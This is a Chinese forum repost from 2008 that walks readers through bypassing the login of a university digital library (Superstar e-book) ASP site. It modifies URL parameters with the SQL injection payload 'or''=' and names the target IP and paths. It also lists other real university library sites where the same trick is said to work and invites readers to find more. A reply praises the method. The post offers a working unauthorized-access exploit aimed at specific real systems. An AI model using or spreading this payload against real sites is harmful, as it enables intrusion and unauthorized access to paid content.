[转贴]绝对经典的利用asp漏洞进入超星秘笈![加密1]
绝对经典的利用asp漏洞进入超星秘笈!强烈要求版主给予奖励!这是在看了论坛上的一个帖子后测试找出来的,特向菜鸟们推荐,
希望对大家有所帮助!
深圳广播电视大学数字图书馆
[url]http://218.17.219.22/bookhtm/index.asp[/url]
搜索需要输入用户名、密码
我们可以构造查询条件,突破限制
做法如下:
1.随便输入学号、密码,登陆,例如:学号=1,密码=1.这时会出现“此用户不存在!返回”
ie地址栏中地址为:[url]http://218.17.219.22/bookhtm/sq/load.asp?user=1&mima=1&b1.x=31&b1.y=6[/url]
2.修改地址进入:
将上面地址中user=1&mima=1改为:user='or''='&mima='or''='
或者user='orƇ'=Ƈ&mima='orƇ'=Ƈ 也可
即:[url]http://218.17.219.22/bookhtm/sq/load.asp?user=[/url]'or''='&mima='or''='&b1.x=31&b1.y=6
就是登陆地址了。
3.登陆后可以随便看了
同样的道理利用这个漏洞,可以登陆另外几个需要输入用户名、密码的站点,需要输入的地方都输上'or''='
如:驻马店电大:[url]http://www.zmdtvu.net/dabookhtm/[/url]
铜陵电大:>[url]http://218.22.180.149/index.asp[/url]其他的自己好好发掘吧,^_^
[[i] 本帖最后由 dry811224 于 2008-5-7 11:21 编辑 [/i]] 高手阿,学了asp没想到可以这么用 试一试,不知是否可行
页:
[1]
